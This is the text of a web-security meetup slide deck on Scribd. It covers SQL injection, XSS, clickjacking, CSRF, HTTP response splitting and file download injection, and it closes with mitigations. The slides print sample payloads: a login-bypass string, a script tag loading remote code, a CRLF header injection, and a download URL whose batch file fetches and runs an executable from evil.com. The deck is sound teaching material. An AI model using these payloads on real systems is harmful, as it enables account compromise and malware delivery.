Scribd Logo
Hochladen

Willkommen bei Scribd!

  • Trendy Web Security

    Hochgeladen von

    LAwebdevmeetup
    140 Ansichten38 Seiten
    by Chris Schneider. Presented at http://web.meetup.com/34/calendar/8883832/ . Clickjacking, response splitting, and other nasties.

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Verfügbare Formate

    PDF, TXT oder online auf Scribd lesen

    Stufen Sie dieses Dokument als nützlich ein?

    Sind diese Inhalte unangemessen?

    Dieses Dokument melden
    by Chris Schneider. Presented at http://web.meetup.com/34/calendar/8883832/ . Clickjacking, response splitting, and other nasties.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Als PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    140 Ansichten38 Seiten

    Trendy Web Security

    Hochgeladen von

    LAwebdevmeetup
    by Chris Schneider. Presented at http://web.meetup.com/34/calendar/8883832/ . Clickjacking, response splitting, and other nasties.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Als PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    von 38

    Trendy Web Security

    A Review of times past


    SQL Injection
    password
    ' OR 1=1; --
    Parses as:
    SELECT username FROM users WHERE username =
    'username' and password = '' OR 1=1
    And you're in...
    Cross Site Scripting
    (XSS)
    About-Me field
    I enjoy long walks on the beach, and
    <script src="http://my-hacks.com/owned.js"></script>
    Now, you have your
    code running in
    another guy's browser
    Have your code change
    his linksys' DNS settings?
    SQL Injections and XSS
    attacks are old news.
    What's new(er)?
    Click Jacking
    A Demo...
    No JS Needed!
    Cross Site Request
    Forgery
    <img src="http://www.google.com/ig/logout?
    continue=http://www.google.com/ig%3Fhl%3Den">
    You are now logged out
    of google.
    Or... had your domain
    stolen
    • CSRF Creates a new Gmail Filter which
    forwards certain emails
    • Hacker sends an email forwarded to your
    host, asking for a transfer + unlock
    • Hacker transfers your domain away.
    HTTP Response
    Splitting
    /redir_lang.jsp?lang=English

    /redir_lang.jsp?lang=foobar%0d%0aContent-
    Length:%200%0d%0a%0d%0aHTTP/
    1.1%20200%20OK%0d%0aContent-
    Type:%20text/html%0d%0aContent-
    Length:%2019%0d%0a%0d
    %0a<html>Shazam</html>
    HTTP/1.1 302 Moved Temporarily
    Date: Wed, 24 Dec 2003 15:26:41 GMT
    Location: http://10.1.1.1/by_lang.jsp?lang=foobar
    Content-Length: 0

    HTTP/1.1 200 OK
    Content-Type: text/html
    Content-Length: 19

    <html>Shazam</html>
    Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT
    2003 271009 with
    Content-Type: text/html
    Set-Cookie:
    JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST9Us
    S!-1251019693; path=/
    Connection: Close

    <html><head><title>302 Moved Temporarily</title></head>


    <body bgcolor="#FFFFFF">
    <p>This document you requested has moved temporarily.</p>
    <p>It's now at <a
    href="http://10.1.1.1/by_lang.jsp?lang=foobar
    Content-Length: 0

    HTTP/1.1 200 OK
    Content-Type: text/html
    Content-Length: 19

    &lt;html&gt;Shazam&lt;/html&gt;">http://10.1.1.1/by_lang.jsp?l
    ang=foobar
    Content-Length: 0

    HTTP/1.1 200 OK
    Content-Type: text/html
    Content-Length: 19

    &lt;html&gt;Shazam&lt;/html&gt;</a>.</p>
    </body></html>
    Why?

    • Cache Poisoning
    • Replace content
    • Phishing
    • XSS
    • etc.
    File Download Injection
    An similar idea to
    response splitting
    We've all written
    download scripts:
    download.php?file=report.xls
    $filename = basename($_GET["download"]);
    header('Content-Disposition: attachment; filename="' . $filename . '"');
    readfile(basename($_GET["download"]));
    return;
    http://[trusted_domain]/download.php?file=attack.bat%0d
    %0a%0d%0aecho%20get%20/pub/winzip/wzinet95.exe|ftp%20-A
    %20evil.com%0d%0awzinet95.exe
    HTTP/1.1 200 OK
    Date: Thu, 27 Mar 2008 05:02:24 GMT
    Server: Apache
    Path=/download
    Content-Disposition: attachment;filename=attack.bat
    Content-length: 88

    echo get /pub/winzip/wzinet95.exe|ftp -A evil.com


    awzinet95.exe
    Content-Length: 0
    Content-Type: application/octet-stream;charset=euc-kr
    It's a dangerous world...
    How about some
    Mitigation
    As a user

    Sensitive stuff in
    separate browser?
    As a programmer:
    Whitelist everything.
    Nothing gets through
    w/o you knowing
    As a programmer:

    GET vs. POST. Use


    them correctly.
    Download Injection:

    Use the real file name,


    and not the http
    argument
    ClickJacking
    NoScript has a
    "Forbid iframe" feature
    Links
    • http://it.slashdot.org/article.pl?sid=08/09/25/1955228&from=rss

    • http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf

    • http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf

    • http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042358.html

    • http://www.webappsec.org/lists/websecurity/archive/2008-04/msg00003.html

    • http://www.aspectsecurity.com/documents/Aspect_File_Download_Injection.pdf

    • http://www.breakingpointsystems.com/community/blog/clickjacking

    • http://en.wikipedia.org/wiki/Cross-site_request_forgery

    • http://www.davidairey.com/google-gmail-security-hijack/

    • http://www.cyberciti.biz/tips/firefox-stop-clickjacking-attack.html

    Das könnte Ihnen auch gefallen